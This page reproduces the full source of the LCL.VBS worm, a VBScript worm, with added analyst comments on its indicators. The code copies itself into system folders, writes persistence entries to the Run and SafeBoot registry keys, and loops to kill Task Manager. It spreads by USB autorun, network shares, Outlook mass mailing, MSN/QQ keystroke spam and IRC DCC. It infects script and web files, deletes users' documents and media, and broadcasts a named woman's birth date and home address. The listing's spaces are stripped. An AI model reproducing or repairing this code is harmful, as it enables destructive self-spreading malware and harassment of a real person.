LCL.VBS 病毒源代码

时间:2021-05-22

rem email:kouguoxi@hotmail.com
rem some crack statement i remment,make it can't to run
' Analyst note: this listing is a VBScript worm (self-copying, mass-mailing,
' file-infecting) kept for study. The page text has lost its inter-token spaces,
' and the author's header above states that statements were altered so that it
' does not run. The comments added here describe behaviour for detection and
' clean-up only.
' File indicators in this section: lcl.vbs in the Windows and System folders,
' lcl.txt in the drive root and in the user's Startup folder.

' Suppresses all runtime errors, so failed operations stay invisible to the user.
onerrorresumenext

' Subject line and message body reused later by the mail and messenger routines.
dimtitle,text
title="canyouhelpmefindaperson?"
text="hernameisLiuChunli."&chr(13)&chr(10)
text=text&"herbirthdayis1981-01-23."&chr(13)&chr(10)
text=text&"hermotherhomeisYuzhen.Qixian.Kaifeng.Henan.China."&chr(13)&chr(10)
text=text&"Iwasdiedbecausebyher,"&chr(13)&chr(10)
text=text&"Iamdemandingmylifeofyou."&chr(13)&chr(10)

' The COM ProgIDs are assembled from string fragments; presumably so the full
' literal never appears for a plain string signature to match. Detection should
' therefore key on behaviour (wscript.exe writing .vbs files into system folders).
Setfso=CreateObject("Scripting"&"."&"FileSystem"&"Object")
' Reads the script's own source into `self`; later routines append it to other files.
self=fso.opentextfile(wscript.scriptfullname,1).readall
setWshShell=WScript.CreateObject("WScript"&"."&"Shell")
Startup=WshShell.SpecialFolders("Startup")
' GetSpecialFolder: 0 = Windows folder, 1 = System folder, 2 = Temp folder.
Setdirwin=fso.GetSpecialFolder(0)
Setdirsystem=fso.GetSpecialFolder(1)
Setdirtemp=fso.GetSpecialFolder(2)
' Copies the running script into the Windows and System folders.
Setlcl=fso.GetFile(WScript.ScriptFullName)
lcl.Copy(dirwin&"\lcl.vbs")
lcl.Copy(dirsystem&"\lcl.vbs")
' attributes=7 is ReadOnly(1)+Hidden(2)+System(4): the copies are hidden from a
' default Explorer view, so triage needs hidden and system files shown.
fso.getfile(dirwin&"\lcl.vbs").attributes=7
fso.getfile(dirsystem&"\lcl.vbs").attributes=7

' Writes the message text to <drive of the Windows folder>\lcl.txt and copies
' that file into the Startup folder.
setsf0=fso.GetSpecialFolder(0)
b=sf0.drive&"\lcl.txt"
Setlcl=fso.CreateTextFile(b,True)
lcl.Writetext
fso.CopyFileb,Startup&"\lcl.txt"
lcl.Close

' Reopens the script's own file for overwriting (second argument True); the
' handle is written by the encoding loop further down the file.
dimlcl
Setlcl=fso.CreateTextFile(wscript.scriptfullname,True)

' scode(N): returns the character code of the single character N by comparing
' it against chr(0)..chr(254) in turn. When no code in that range matches, the
' function ends without assigning a return value.
Functionscode(N)
dimx
forx=0to254
ifn=chr(x)then
scode=x
exitfunction
endif
next
endfunction

' Self-rewriting step: walks the script's own source one character at a time and
' writes the result back over the script file. From position 100 on, when the
' source contains the marker "LiuChunli", each character code is shifted by 9;
' otherwise characters are copied unchanged. For analysts this means the on-disk
' copy can differ from the original text after the first 99 characters, so a
' hash of one sample is a weak indicator; the marker string and the dropped file
' names are more stable.
rem Asking for advice: how to encrypt whole lines with readline and similar methods while keeping the text layout unchanged, and how to decrypt.
rem I cannot get execute to work well; advice welcome.
dimcc,cipher,correy
forl=1tolen(self)
cc=mid(self,l,1)
ifl>99andinstr(self,"LiuChunli")>0then
cipher=chr(scode(cc)+9)rem I first used 99 and got only data whose ASCII value was 0
else
cipher=chr(scode(cc))
endif
correy=correy&cipher
next

' Writes the transformed text into the handle opened on the script's own path.
lcl.Writecorrey
lcl.Close

' Persistence section. Every value written here is named "lcl" (or "lcl.vbs"
' under SafeBoot) and points at <System folder>\lcl.vbs, which makes the value
' name and data useful registry indicators. Key names in this listing lost their
' spaces together with the rest of the page text.
dimhk,hc,safe
hk="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run"
hc="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
' Writes 0 to the script host's per-user Timeout setting; presumably to remove
' any script time limit (confirm against the host's documentation).
wshshell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\WindowsScriptingHost\Settings\Timeout",0,"REG_DWORD"
' The suffixes are appended to a path ending in "run", producing run, runexec,
' runOnce, runOnceEx, runservice and runServices under HKLM ...
wshshell.Regwritehk&"\lcl",dirsystem&"\lcl.vbs"
wshshell.Regwritehk&"exec\lcl",dirsystem&"\lcl.vbs"
wshshell.Regwritehk&"Once\lcl",dirsystem&"\lcl.vbs"
wshshell.Regwritehk&"OnceEx\lcl",dirsystem&"\lcl.vbs"
wshshell.Regwritehk&"service\lcl",dirsystem&"\lcl.vbs"
wshshell.Regwritehk&"Services\lcl",dirsystem&"\lcl.vbs"
' ... and Run, Runexec, RunOnce and Runservice under HKCU.
wshshell.Regwritehc&"\lcl",dirsystem&"\lcl.vbs"
wshshell.Regwritehc&"exec\lcl",dirsystem&"\lcl.vbs"
wshshell.Regwritehc&"Once\lcl",dirsystem&"\lcl.vbs"
wshshell.Regwritehc&"service\lcl",dirsystem&"\lcl.vbs"
' Also writes entries under the SafeBoot Minimal and Network keys, so clean-up
' must cover these keys as well as the Run keys.
safe="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\"
wshshell.Regwritesafe&"Minimal\lcl.vbs",dirsystem&"\lcl.vbs"
wshshell.Regwritesafe&"Network\lcl.vbs",dirsystem&"\lcl.vbs"

' Repeatedly launches hidden (window style 0) taskkill commands against
' taskmgr.exe and tasklist.exe to hinder inspection of running processes.
' A script host spawning cmd/taskkill in a tight loop is a strong
' process-creation detection signal.
do
wshshell.run"cmd/ctaskkill/f/imtaskmgr.exe",0
wshshell.run"cmd/ctaskkill/f/imtasklist.exe",0
loop

' Drive propagation. For every drive whose type is not 4 (CD-ROM) the message
' file is copied to the root and scan() is called on the drive. For ready
' removable drives (type 1) with more than 99 KB free, four hidden files are
' written to the root: lcl.vbs, autorun.inf, desktop.ini and lclrun.vbs.
' Defensive notes: disabling AutoRun for removable media neutralises the
' autorun.inf entries, and these four hidden root files are the indicators to
' look for on USB media.
dimd
ForEachdinfso.Drives
ifd.drivetype<>4then
fso.CopyFileb,d&"\lcl.txt"
scan(d)
endif
ifd.drivetype=1andd.isready=trueandFormatNumber(d.FreeSpace/1024,0)>99then
fso.copyfilewscript.scriptfullname,d&"\lcl.vbs"
fso.getfile(wscript.scriptfullname).attributes=7
' autorun.inf: redirects the drive's "open" and "explore" shell verbs to the
' script host; the file is created and then marked ReadOnly+Hidden+System.
setinf=fso.createtextfile(d&"\autorun.inf",true)
fso.getfile(d&"\autorun.inf").attributes=7
inf.writeline"[autorun]"
inf.writeline"open="
inf.writeline"shell\open=打开(&O)"
inf.writeline"shell\open\Command=WScript.exelclrun.vbs"
inf.writeline"shell\open\Command=WScript.exelcl.vbs"
inf.writeline"shell\open\Default=1"
inf.writeline"shell\explore=资源管理器(&X)"
inf.writeline"shell\explore\Command=WScript.exelclrun.vbs"
inf.writeline"shell\explore\Command=WScript.exelcl.vbs"
inf.close
' desktop.ini: the CLSID is the Recycle Bin shell-folder class, so the drive
' root would presumably be displayed as a Recycle Bin instead of its contents.
setini=fso.createtextfile(d&"\desktop.ini",true)
fso.getfile(d&"\desktop.ini").attributes=7
ini.writeline"[.ShellClassInfo]"
ini.writeline"CLSID={645FF040-5081-101B-9F08-00AA002F954E}"
ini.close
' lclrun.vbs: a small generated helper script, written line by line, that
' loops over drives and launches the copies found on removable ones.
setlclrun=fso.createtextfile(d&"\lclrun.vbs",true)
fso.getfile(d&"\lclrun.vbs").attributes=7
lclrun.writeline"OnErrorGoTo0"
lclrun.writeline"setfso=CreateObject("&chr(34)&"Scripting.FileSys"&chr(34)&"&"&chr(34)&"temObject"&chr(34)&")"
lclrun.writeline"iforeachdinfso.drives"
lclrun.writeline"ifd.drivetype=1andd.isready=trueandFormatNumber(d.FreeSpace/1024,0)>99then"
lclrun.writeline"fso.getfile(d.driveletter"&"&"&chr(34)&":\lclrun.vbs"&chr(34)&").attributes=7"
lclrun.writeline"setwshshell=wscript.createobject("&chr(34)&"WScript.Shell"&chr(34)&")"
lclrun.writeline"wshshell.run"&chr(34)&"d.driveletter"&"&"&chr(34)&":\lclrun.vbs"&chr(34)&chr(34)
lclrun.writeline"wshshell.run"&chr(34)&"d.driveletter"&"&"&chr(34)&":\lcl.vbs"&chr(34)&chr(34)
lclrun.writeline"endif"
lclrun.writeline"next"
lclrun.close
endif
next

' Network share propagation: enumerates the mapped network drives and calls
' scan() on both members of each pair returned by EnumNetworkDrives (the loop
' steps by 2; presumably local name and remote path). Writable shares mapped on
' an affected host should be included in the clean-up scope.
dimwshnetwork,netdrives,net1,net2
SetWSHNetwork=WScript.CreateObject("WScript.Network")
SetnetDrives=WSHNetwork.EnumNetworkDrives
IfnetDrives.Count>0Then
Fori=0TonetDrives.Count-1Step2
net1=netdrives(i)
net2=netDrives(i+1)
scan(net1)
scan(net2)
Next
EndIf

' Mass-mailing routine 1: automates Outlook through COM and addresses one
' message to every entry in every address list, with the subject and body built
' at the top of the file and <Windows folder>\lcl.vbs attached.
' DeleteAfterSubmit removes the sent copy, so the Sent Items folder is not
' reliable evidence; mail-gateway logs are. The marker value
' HKCU\software\Mailtest\mailed is a host indicator. Blocking .vbs attachments
' at the mail gateway stops this vector.
dimoutlookapp,mapiobj,addrlist,addrentcount,item,addrent,attachments
SetoutlookApp=CreateObject("Outlook.App"&"lication")
IfoutlookApp="Outlook"oroutlookapp="outlookexpress"Then
SetmapiObj=outlookApp.GetNameSpace("MAPI")'' get the MAPI namespace
SetaddrList=mapiObj.AddressLists'' get the number of address lists
ForEachaddrInaddrList
Ifaddr.AddressEntries.Count<>0Then
addrEntCount=addr.AddressEntries.Count'' get the number of e-mail records in each address list
ForaddrEntIndex=1ToaddrEntCount'' iterate over the e-mail addresses of the address list
Setitem=outlookApp.CreateItem(0)'' get a mail object instance
SetaddrEnt=addr.AddressEntries(addrEntIndex)'' get the specific e-mail address
item.To=addrEnt.Address
item.Subject=title
item.Body=text
SetattachMents=item.Attachments
attachMents.Addfso.GetSpecialFolder(0)&"\lcl.vbs"
item.DeleteAfterSubmit=True'' delete the message automatically after it is submitted
Ifitem.To<>""Then
item.Send
wshshell.regwrite"HKCU\software\Mailtest\mailed","1"
EndIf
Next
EndIf
Next
Endif

' Mass-mailing routine 2; the author's own remark below attributes it to the
' ILOVEYOU worm. It records state under HKEY_CURRENT_USER\Software\Microsoft\WAB\:
' one value per address list holding the entry count, and one REG_DWORD value per
' recipient already mailed, so each address is mailed once. Those values are
' registry indicators of prior activity on a host.
remnextfromiloveyou.
setout=WScript.CreateObject("Outlook.Application")
setmapi=out.GetNameSpace("MAPI")
forctrlists=1tomapi.AddressLists.Count
seta=mapi.AddressLists(ctrlists)
x=1
' Previously recorded entry count for this list; defaults to 1 when absent.
regv=wshshell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if(regv="")then
regv=1
endif
' Only processes the list when it now holds more entries than were recorded.
if(int(a.AddressEntries.Count)>int(regv))then
forctrentries=1toa.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=wshshell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
' An empty read means this recipient has no marker yet.
if(regad="")then
setmale=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject=title
male.Body=text
male.Attachments.Add(dirsystem&"lcl.vbs")
male.Send
wshshell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
endif
x=x+1
next
wshshell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
wshshell.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
endif
next
Setout=Nothing
Setmapi=Nothing

' Mass-mailing routine 3: same address-list walk as the first routine, but the
' attachments collection is reached through `execute` on a string built from
' Chr() codes that spell "Attachments". This hides the property name from
' plain-text signatures, so static rules should also cover Chr()-concatenation
' passed to execute. strFilePathName is not assigned anywhere in the visible
' listing.
SetobjOutlook=CreateObject("Outlook.Application")
IfobjOutlook="Outlook"Then
SetobjNamespace=objOutlook.GetNameSpace("MAPI")
SetcolAddressLists=objNamespace.AddressLists
SetonjNameSpace=Nothing
ForEachobjItemIncolAddressLists
IfobjItem.AddressEntries.Count<>0Then
intCountOfAddresses=objItem.AddressEntries.Count
Fori=1TointCountOfAddresses
SetobjMailMsg=objOutlook.CreateItem(0)
SetobjDestAddress=objItem.AddressEntries(i)
objMailMsg.To=objDestAddress.Address
objMailMsg.Subject=title
objMailMsg.Body=text
execute"setobjSend=objMailMsg."&Chr(65)&Chr(116)&Chr(116)&Chr(97)&Chr(99)&Chr(104)&Chr(109)&Chr(101)&Chr(110)&Chr(116)&Chr(115)
strAttach=strFilePathName
' As in the first routine, the sent copy is deleted after submission.
objMailMsg.DeleteAfterSubmit=True
objSend.AddstrAttach
IfobjMailMsg.To<>""Then
objMailMsg.Send
EndIf
Next
EndIf
Next
SetobjOutlook=Nothing
SetobjItem=Nothing
SetobjMailMsg=Nothing
SetobjDestAddress=Nothing
EndIf

' Instant-messenger routine: lists local processes through WMI (Win32_Process)
' and, for processes named msn.exe or qq.exe, activates the window and types the
' message text with SendKeys, pausing 9000 ms between lines. No file is sent
' here; the effect is unsolicited messages from the victim's account. A script
' host querying Win32_Process and then sending synthetic keystrokes is the
' behaviour to alert on.
strComputer="."
SetwbemServices=Getobject("winmgmts:\\"&strComputer)
SetwbemObjectSet=wbemServices.InstancesOf("Win32_Process")
ForEachwbemObjectInwbemObjectSet
ifwbemObject.Name="msn.exe"orwbemObject.Name="qq.exe"then
WshShell.AppActivatewbemobject.name
WshShell.SendKeys"canyouhelpmefindaperson?"
WshShell.SendKeys"^{enter}"'or"^~"
WScript.Sleep9000
WshShell.SendKeys"hernameisLiuChunli"
WshShell.SendKeys"^{enter}"
WScript.Sleep9000
WshShell.SendKeys"herbirthdayis1981-02-17."
WshShell.SendKeys"^{enter}"
WScript.Sleep9000
WshShell.SendKeys"hermotherhomeisYuzhen.Qixian.Kaifeng.Henan.China."
WshShell.SendKeys"^{enter}"
endif
Next

' scan(folder): walks every file in `folder`, then recurses into each subfolder.
' Per file it reads the whole content, takes the lower-cased extension and uses
' the string "LiuChunli" as the already-infected marker. Branches by extension:
'   - script files (vbs, vbe, wsc, wsf, wsh, sct): the worm source is appended;
'   - web/mail files (htm, html, ..., eml, asp, aspx, hta, ...): the worm source
'     is appended wrapped in a VBScript <SCRIPT> element;
'   - ini: a [script] section is appended that sends <System folder>\lcl.vbs over
'     DCC to users joining a channel (IRC client script format, presumably mIRC);
'   - mp3, doc, docx, dwg, wma, swf, jpg: the file is deleted (destructive
'     payload; recovery depends on backups).
' For responders: the marker string and a trailing script block at the end of
' web or script files identify modified files; those need restoring from a
' known-good copy rather than just deleting lcl.vbs.
subscan(folder)
' Restores default error handling inside this routine.
OnErrorGoTo0
setfd=fso.getfolder(folder)
foreachfileinfd.files
self1=fso.opentextfile(file,1).readall
ext=fso.GetExtensionName(file)
ext=lcase(ext)
ifext="vbs"orext="vbe"orext="wsc"orext="wsf"orext="wsh"orext="sct"then
ifinstr(self1,"LiuChunli")<0then
' Mode 8 opens the target for appending.
setlcl=fso.opentextfile(file.path,8,true)
lcl.writechr(13)&chr(10)
lcl.writeself
lcl.writechr(13)&chr(10)
lcl.close
endif
endif
ifext="htm"orext="html"orext="xhtml"orext="shtml"orext="dhtml"orext="phtml"orext="eml"then
ifinstr(self1,"LiuChunli")<0then
setlcl=fso.opentextfile(file.path,8,true)
' The tag is split into "<" and the rest, as elsewhere in this file where
' literals are fragmented.
lcl.write"<"&"SCRIPTLANGUAGE='VBScript'>"
lcl.writechr(13)&chr(10)
lcl.writeself
lcl.write"<"&"/SCRIPT>"
lcl.writechr(13)&chr(10)
lcl.close
endif
endif
remorext="mspx"
ifext="htd"orext="asp"orext="htt"orext="aspx"orext="cfm"orext="tpl"orext="dtd"orext="hta"then
ifinstr(self1,"LiuChunli")<0then
setlcl=fso.opentextfile(file.path,8,true)
lcl.write"<"&"SCRIPTLANGUAGE='VBScript'>"
lcl.writechr(13)&chr(10)
lcl.writeself
lcl.write"<"&"/SCRIPT>"
lcl.writechr(13)&chr(10)
lcl.close
endif
endif
ifext="ini"then
ifnotinstr(self1,"LiuChunli")>0then
dimini
setini=fso.opentextfile(file.path,8,true)
ini.writelinechr(13)&chr(10)
ini.WriteLine"[script]"
ini.WriteLine"n0=on1:JOIN:#:{"
ini.WriteLine"n1=/if($nick==$me){halt}"
ini.WriteLine"n2=/.dccsend$nick"&dirsystem&"\lcl.vbs"
remini.WriteLine"n0=on1:join:*.*:{if($nick!=$me){halt}/dccsend$nick"&dirsystem&"\lcl.vbs"}"
' uses the command /ddcsend$nick"&dirsystem&"\lcl.vbs" to send the virus file to the other users in the channel
ini.WriteLine"n3=}"
' The marker is written as an ini comment so the file is recognised as processed.
ini.WriteLine";LiuChunli"
ini.close
endif
endif
remevery9inthelunarcalendadoit
ifext="mp3"orext="doc"orext="docx"orext="dwg"orext="wma"orext="swf"orext="jpg"then
' Forced delete (argument True) of the user's media and document files.
file.deletetrue
endif
next
foreachsubfdinfd.subfolders
scan(subfd)
next
endsub
